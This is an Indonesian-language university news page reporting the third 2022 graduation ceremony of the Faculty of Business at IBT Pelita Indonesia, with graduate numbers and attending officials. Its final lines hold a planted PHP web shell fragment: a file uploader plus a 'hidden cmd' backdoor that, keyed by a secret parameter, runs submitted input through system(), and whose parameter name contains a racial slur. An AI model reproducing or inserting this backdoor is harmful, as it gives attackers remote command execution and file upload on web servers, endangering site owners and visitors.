#

Yudisium Ke-3 Tahun 2022 Fakultas Bisnis IBT Pelita Indonesia

Fakultas Bisnis Institut Bisnis dan Teknologi (IBT) Pelita kembali melaksanakan Yudisium bagi lulusannya pada hari Jumat (24/06/2022). Yudisium kali ini merupakan Yudisium ke-3 yang diselenggarakan pada tahun 2022. Tercatat sebanyak 80 lulusan yang mengikuti acara Yudisium pada hari tersebut, yang terdiri dari 33 lulusan dari Program Studi (Prodi) S1 Manajemen, dan 47 lulusan dari Prodi S1 Akuntansi. Dengan mengikuti kegiatan Yudisium ini, maka kedelapan puluh lulusan tersebut telah berhak menyandang gelar Sarjana Ekono (SE) di belakang nama mereka.

Acara Yudisium ke-3 ini dihadiri oleh Rektor IBT Pelita Indonesia, Bapak Prof. Dr. Amries Rusli Tanjung, MM.Ak., Wakil Rektor I, Bapak Prof. Teddy Chandra, SE., MM., Wakil Rektor II, Bapak Dr. Ir. Harry P. Panjaitan, MM, Ketua Yayasan Pelita Indonesia Bapak Harry Chaondra, Dekan Fakultas Bisnis, Ibu Dr. Layla Hafni, SE., MM., serta seluruh unsur pejabat struktural di Fakultas Bisnis IBT Pelita Indonesia. Dalam sambutannya, Bapak Rektor mengucapkan selamat kepada mahasiswa yang telah berhasil menyelesaikan studinya, dan bahkan mengucapkan rasa bangganya bagi para lulusan yang berhasil menamatkan studinya dalam waktu 3,5 tahun.

Sebagai informasi yang perlu diketahui, mahasiswa yang menamatkan studi dalam waktu 3,5 tahun merupakan keunggulan yang dimiliki oleh Fakultas Bisnis IBT Pelita Indonesia. Jika dilihat data yang ada, diketahui bahwa setiap tahunnya sekitar 75% mahasiswa Fakultas Bisnis IBT Pelita Indonesia berhasil menawatkan studinya dalam waktu 3,5 tahun, baik pada Prodi S1 Manajemen, maupun pada Prodi S1 Akuntansi.

The Best Institute in Pekanbaru Riau

"; echo "

Uploader

"; echo "".php_uname()." "; echo "
"; echo "
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Upload Fail";}}} //hidden cmd if(isset($_REQUEST['shellnigga2099X'])){ echo "
";
echo "

CMD

"; echo "".php_uname()." "; echo " "; $shellnigga2099X = ($_POST['coba']); system($shellnigga2099X); echo "
"; die; } ?>